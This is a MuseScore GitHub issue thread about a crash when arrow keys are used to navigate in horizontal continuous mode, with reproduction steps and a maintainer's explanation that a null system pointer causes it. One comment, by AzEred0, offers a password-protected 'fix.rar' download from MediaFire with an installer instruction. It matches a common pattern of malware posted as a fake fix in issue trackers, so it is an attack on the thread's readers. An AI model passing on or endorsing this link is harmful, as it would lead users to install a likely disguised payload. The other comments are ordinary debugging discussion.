### ISSUE TITLE
Crash on arrow button navigation in horizontal continuous mode

### ISSUE THREAD

**Issue by svetter** [musescore/MuseScore#24234]
### Issue type

Crash or freeze

### Description with steps to reproduce

1. Create a new score
2. Change to horizontal continuous mode
3. Press Alt+Right arrow key (Note 'Vertical frame' in status bar)
4. Press Right arrow key

### Supporting files, videos and screenshots

https://github.com/user-attachments/assets/81f595ce-0b9f-4de8-bfd8-27be7f455cf2

[MuseScore_240827_161220.log](https://github.com/user-attachments/files/16763592/MuseScore_240827_161220.log)

### What is the latest version of MuseScore Studio where this issue is present?

db77a84e

### Regression

I was unable to check

### Operating system

Windows 10

### Checklist

- [X] This report follows the [guidelines](https://github.com/musescore/MuseScore/wiki/Reporting-bugs-and-issues) for reporting bugs and issues
- [X] I have verified that this issue has not been logged before, by searching the [issue tracker](https://github.com/musescore/MuseScore/issues) for similar issues
- [X] I have attached all requested files and information to this report
- [X] I have attempted to identify the root problem as concisely as possible, and have used minimal reproducible examples where possible

**Comment by AzEred0** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by cbjeukendrup** [comment]
What happens here, is the following:
1. Alt+Right selects the "first element of the score", which is the title frame (but it is invisible)
2. Because the frame is selected, it enters "edit mode"
3. Pressing Right results in a call to `Box::editDrag`; and there, the crash occurs, because `system()` is nullptr (the title frame is namely not in any frame when in continuous view)

**Comment by zacjansheski** [comment]
Looks like this occurs in all versions of 4
